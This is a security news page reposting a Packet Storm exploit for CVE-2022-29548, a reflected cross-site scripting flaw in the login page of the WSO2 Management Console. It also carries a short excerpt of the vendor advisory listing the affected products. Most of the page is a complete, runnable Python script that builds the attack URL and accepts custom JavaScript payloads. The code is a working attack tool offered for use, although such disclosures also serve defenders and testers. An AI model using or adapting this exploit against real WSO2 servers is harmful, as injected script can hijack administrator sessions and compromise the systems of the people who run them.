Security
Headlines
HeadlinesLatestCVEs

Headline

WSO2 Management Console Cross Site Scripting

WSO2 Management Console suffers from a cross site scripting vulnerability. Many different product versions are affected.

Packet Storm
#xss#vulnerability#ubuntu#js#java#auth#chrome
# Exploit Title: WSO2 Management Console (Multiple Products) - Unauthenticated Reflected Cross-Site Scripting (XSS)# Date: 21 Apr 2022# Exploit Author: cxosmo# Vendor Homepage: https://wso2.com# Software Link: API Manager (https://wso2.com/api-manager/), Identity Server (https://wso2.com/identity-server/), Enterprise Integrator (https://wso2.com/integration/) # Affected Version(s): API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0 and 4.0.0;     # API Manager Analytics 2.2.0, 2.5.0, and 2.6.0;    # API Microgateway 2.2.0;    # Data Analytics Server 3.2.0;    # Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0;    # IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0;    # Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0;    # Identity Server Analytics 5.5.0 and 5.6.0;    # WSO2 Micro Integrator 1.0.0.# Tested on: API Manager 4.0.0 (OS: Ubuntu 21.04; Browser: Chromium Version 99.0.4844.82)# CVE: CVE-2022-29548import argparseimport loggingimport urllib.parse# Global variablesVULNERABLE_ENDPOINT = "/carbon/admin/login.jsp?loginStatus=false&errorCode="DEFAULT_PAYLOAD = "alert(document.domain)"# Logging configlogging.basicConfig(level=logging.INFO, format="")log = logging.getLogger()def generate_payload(url, custom_payload=False):    log.info(f"Generating payload for {url}...")    if custom_payload:        log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{custom_payload}//")    else:        log.info(f"[+] GET-based reflected XSS payload: {url}{VULNERABLE_ENDPOINT}%27);{DEFAULT_PAYLOAD}//")def clean_url_input(url):    if url.count("/") > 2:        return f"{url.split('/')[0]}//{url.split('/')[2]}"    else:        return urldef check_payload(payload):    encoded_characters = ['"', '<', '>']    if any(character in payload for character in encoded_characters):        log.info(f"Unsupported character(s) (\", <, >) found in payload.")        return False    else:        return urllib.parse.quote(payload)if __name__ == "__main__":    # Parse command line    parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)    required_arguments = parser.add_argument_group('required arguments')    required_arguments.add_argument("-t", "--target",                        help="Target address {protocol://host} of vulnerable WSO2 application (e.g. https://localhost:9443)",                        required="True", action="store")    parser.add_argument("-p", "--payload",                        help="Use custom JavaScript for generated payload (Some characters (\"<>) are HTML-entity encoded and therefore are unsupported). (Defaults to alert(document.domain))",                        action="store", default=False)    args = parser.parse_args()    # Clean user target input    args.target = clean_url_input(args.target.lower())    # Check for unsupported characters in custom payload; URL-encode as required    if args.payload:        args.payload = check_payload(args.payload)        if args.payload:            generate_payload(args.target, args.payload)    else:        generate_payload(args.target)

Related news

CVE-2022-29548: Security Advisory WSO2-2021-1603 - WSO2 Platform Security

A reflected XSS issue exists in the Management Console of several WSO2 products. This affects API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0.

Packet Storm: Latest News

Siemens Energy Omnivise T3000 8.2 SP3 Privilege Escalation / File Download